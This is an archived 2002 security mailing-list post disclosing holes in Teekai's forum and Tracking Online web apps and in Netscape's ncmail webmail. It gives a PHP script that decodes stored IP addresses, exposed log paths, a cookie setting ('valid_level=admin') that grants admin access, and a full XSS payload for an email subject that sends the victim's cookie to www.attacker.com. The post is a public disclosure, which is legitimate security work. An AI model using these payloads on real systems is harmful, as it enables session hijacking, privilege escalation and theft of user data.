Security holes in two Teekai's products + security hole in ncmail.netscape.com

From: frog frog (leseulfrogat_private)
Date: Mon Jun 03 2002 - 12:52:07 PDT

  • Next message: Nicolas Sigal: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."

    
     ('binary' encoding is not supported, stored as-is)
    Hi :)
    
    Products :
    **********
    Tracking Online 1.0
    Teekai's forum full 1.2
    http://www.teekai.info
    
    Problems :
    **********
    Tracking Online & Teekai's forum :
    - Informations recovery
    - Informations decoding
    Teekai's forum :
    - Admin access
    - small holes
    Tracking Online :
    -XSS
    
    Exploits :
    **********
    Forum & Tracking :
    - Php file to decode informations :
    <?
    $cryptedip = explode('.',$cryptedip);
    $key = md5("20");
    $trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/
    $key.".".$cryptedip[3]/$key;
    echo "Result : $trueip";
    ?>
    
    Forum :
    - /data/member_log.txt
    - Setcookie "valid_level=admin"
    - Setcookie "valid_username_online=[VALUE e.g. JScript ]"
    - ...
    
    Tracking Online :
    - /data/userlog/log.txt
    - /userlog.php
    - ...
    
    More details in french :
    http://www.ifrance.com/kitetoua/tuto/Teekai.txt
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%
    2Fkitetoua%2Ftuto%2FTeekai.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
    
    
    
    
    There is a security hole in the mail service that Netscape proposes ( 
    http://ncmail.netscape.com ).
    It's making it possible to inject HTML in an e-mail... and this service 
    authenticates by the cookies.
    
    The hole consists in sending a mail with for subject a jscript preceded 
    by : ";</script*> .
    
    The idea would be a script of this kind on subject :
    ";</script*><form name=a*><input name=o 
    value=http://www.attacker.com/script?*></form*>&lt;script*>window.open
    (document.a.o.value+document.cookie)</script*>
    
    without '*'.
    I use <form> because " and ' are replaced by \" or \'.
    
    Vendors were informs but did not repair.
    
    Maybe more details soon...
    
    Sorry for my poor english.
    
    frog-m@n 
    



    This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 13:42:11 PDT